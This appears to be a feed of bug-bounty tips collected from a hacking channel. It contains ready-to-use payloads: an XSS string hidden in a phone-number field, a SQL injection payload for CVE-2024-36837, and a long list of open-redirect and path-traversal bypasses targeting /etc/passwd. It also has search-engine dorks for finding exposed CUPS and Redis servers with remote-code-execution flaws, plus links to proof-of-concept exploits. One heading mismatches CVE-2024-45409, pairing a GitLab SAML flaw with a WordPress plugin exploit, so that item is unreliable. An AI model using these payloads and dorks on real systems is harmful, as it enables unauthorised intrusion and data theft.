Bug bounty Tips

Bug Bounty for Beginners 💰 🔖#infosec #cybersecurity #hacking #pentesting #security

*CVE-2024-45409 | Ruby-SAML Auth Bypass In GitLab* _*What You’ll Learn💡*_ 1️⃣ *Overview | Discription of CVE-2024-45409* 2️⃣ *Reconnaissance For CVE-2024-45409* *Shodan.io* *Censys.io* *Fofa.info* *Hunter.how* *ZoomEYE.HK* _<======================>_ 3️⃣ *E͢x͢p͢l͢o͢i͢t͢ ☣️ CVE-2024-45409 | GiveWP WordPress Plugin Exploit* 4️⃣ *E͢x͢p͢l͢o͢i͢t͢ Installation📥* 5️⃣ *E͢x͢p͢l͢o͢i͢t͢ Tool Guide🧭* 6️⃣ *Impact_💥* 7️⃣ *Severity_⚠️* 8️⃣ *Remediation_♻️* _https://yashsec.com/bug-bounty/cve-2024-45409-auth-bypass-in-gitlab/

𝐗𝐒𝐒 𝐢𝐧 𝐏𝐡𝐨𝐧𝐞 𝐍𝐮𝐦𝐛𝐞𝐫 𝐅𝐢𝐞𝐥𝐝 ? 👇 Recently I re-watched the NahamCon2022EU: RTFR (Read The Bleeping RFC) by securinti One thing I was surprised to find out was that phone number fields can be vulnerable to XSS. How is that possible? According to the RFC it is possible to append "optional parameter" to the number. Something like:  • 10203040;𝐞𝐱𝐭=+22  • 10203040;𝐢𝐬𝐮𝐛=12345  • 10203040;𝐩𝐡𝐨𝐧𝐞-𝐜𝐨𝐧𝐭𝐞𝐱𝐭=𝐞𝐱𝐚𝐦𝐩𝐥𝐞 This can lead to XSS if: 1. The library parses phone numbers according to RFC and accepts optional parameters such as "phone-context" 2. The phone number is reflected on the web interface without input validation or output encoding So payloads like "10203040;𝐩𝐡𝐨𝐧𝐞-𝐜𝐨𝐧𝐭𝐞𝐱𝐭=<𝐬𝐜𝐫𝐢𝐩𝐭>𝐚𝐥𝐞𝐫𝐭(1)</𝐬𝐜𝐫𝐢𝐩𝐭>" CAN be a valid phone number and trigger XSS

CVE-2024-31449 and other: Multiple vulnerabilities in Redis, 4.5 - 8.8 rating❗️ Three fresh vulnerabilities allow an attacker to perform RCE due to errors in the Lua scripting engine or DoS via malformed Access Control List selectors. Search at Netlas.io: 👉 Link: https://nt.ls/1G7ul 👉 Dork: protocol:redis Vendor's advisory: https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5

Worlds fastest unlimited single and bulk subdomain finder! Use desktop! https://cyfare.net/apps/subfind/

Worlds fastest unlimited single and bulk subdomain finder! Use desktop! https://cyfare.net/apps/subfind/

Exploiting Visual Studio via dump files - CVE-2024-30052 https://ynwarcs.github.io/exploiting-vs-dump-files

Write-Up — Telegram Anonymous Chat Hack Bot: https://medium.com/@EroHack/write-up-telegram-anonymous-chat-hack-bot-ad3497f813ed?source=rss------bug_bounty-5

If you're into generating subdomains quickly 🚀 check out this website: husseinphp.github.io/subdomain/

SQLI Injection CVE: 2024-36837 Payload: 0-3661)%20OR%20MAKE_SET(8165=8165,7677)%20AND%20(4334=4334 #BugBounty #Tips

CVE-2024-47076/CVE-2024-47175/CVE-2024-47176/CVE-2024-47177: Multiple CUPS flaws enable Linux remote code execution A remote unauthenticated attacker can silently replace existing printers’ (or install new ones) IPP urls with a malicious one, resulting in arbitrary command execution (on the computer) when a print job is started (from that computer). PoC: https://github.com/RickdeJager/cupshax This PoC uses dns-sd printer discovery, so the target must be able to receive the broadcast message, i.e. be on the same network. CUPS Report and POC leaked online: https://gist.github.com/stong/c8847ef27910ae344a7b5408d9840ee1 Refer: https://github.com/OpenPrinting/cups-browsed/security/advisories/GHSA-rj88-6mr5-rcw8 Search Query:

HUNTER: header.server="CUPS"
SHODAN: product:"CUPS(IPP)" server: cups
FOFA: server="CUPS"
ZoomEye: app:"CUPS" +title:"CUPS"

P.S. 2.9M+ Services are found on hunter.how yearly

Fuzzing from First Principles https://zerodayengineering.com/research/slides/FuzzingFromFirstPrinciples.pdf

Finally working on this and I will be back becoming more and more better guys so that I can help you guys understand things on how it really works...

you can try this effective manual openredirect Bypass: 1. Null-byte injection:    - /google.com%00/    - //google.com%00   2. Base64 encoding variations:    - aHR0cDovL2dvb2dsZS5jb20=    - aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==    - //base64:d3d3Lmdvb2dsZS5jb20=/   3. Case-sensitive variations:    - //GOOGLE.com/    - //GoOgLe.com/ 4. Overlong UTF-8 sequences:    - %C0%AE%C0%AE%2F (overlong encoding for ../)    - %C0%AF%C0%AF%2F%2Fgoogle.com 5. Mixed encoding schemes:    - /%68%74%74%70://google.com    - //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D    - //base64:%2F%2Fgoogle.com/ 6. Alternative domain notations:    - //google.com@127.0.0.1/    - //127.0.0.1.xip.io/    - //0x7F000001/ (hexadecimal IP) 7. Trailing special characters:    - //google.com/#/    - //google.com/;&/    - //google.com/?id=123&// 8. Octal IP address format:    - http://0177.0.0.1/    - http://00177.0000.0000.0001/ 9. IP address variants:    - http://3232235777 (decimal notation of an IP)    - http://0xC0A80001 (hex notation of IP)    - http://192.168.1.1/ 10. Path traversal with encoding:     - /..%252f..%252f..%252fetc/passwd     - /%252e%252e/%252e%252e/%252e%252e/etc/passwd     - /..%5c..%5c..%5cwindows/system32/cmd.exe 11. Alternate protocol inclusion:     - ftp://google.com/     - javascript:alert(1)//google.com 12. Protocol-relative URLs:     - :////google.com/     - :///google.com/ 13. Redirection edge cases:     - //google.com/?q=//bing.com/     - //google.com?q=https://another-site.com/ 14. IPv6 notation:     - http://[::1]/     - http://[::ffff:192.168.1.1]/     15. Double URL encoding:     - %252f%252fgoogle.com (encoded twice)     - %255cgoogle.com 16. Combined traversal & encoding:     - /%2E%2E/%2E%2E/etc/passwd     - /%2e%2e%5c%2e%2e/etc/passwd 17. Reverse DNS-based:     - https://google.com.reverselookup.com     - //lookup-reversed.google.com/ 18. Non-standard ports:     - http://google.com:81/     - https://google.com:444/ 19. Unicode obfuscation in paths:     - /%E2%80%8Egoogle.com/     - /%C2%A0google.com/ 20. Query parameters obfuscation:     - //google.com/?q=http://another-site.com/     - //google.com/?redirect=https://google.com/ 21. Using @ symbol for userinfo:     - https://admin:password@google.com/     - http://@google.com 22. Combination of userinfo and traversal:     - https://admin:password@google.com/../../etc/passwd

For finding hidden parameter:

arjun -u https://site.com/endpoint.php -oT arjun_output.txt -t 10 --rate-limit 10 --passive -m GET,POST --headers "User-Agent: Mozilla/5.0"

arjun -u https://site.com/endpoint.php -oT arjun_output.txt -m GET,POST -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -t 10 --rate-limit 10  --headers "User-Agent: Mozilla/5.0"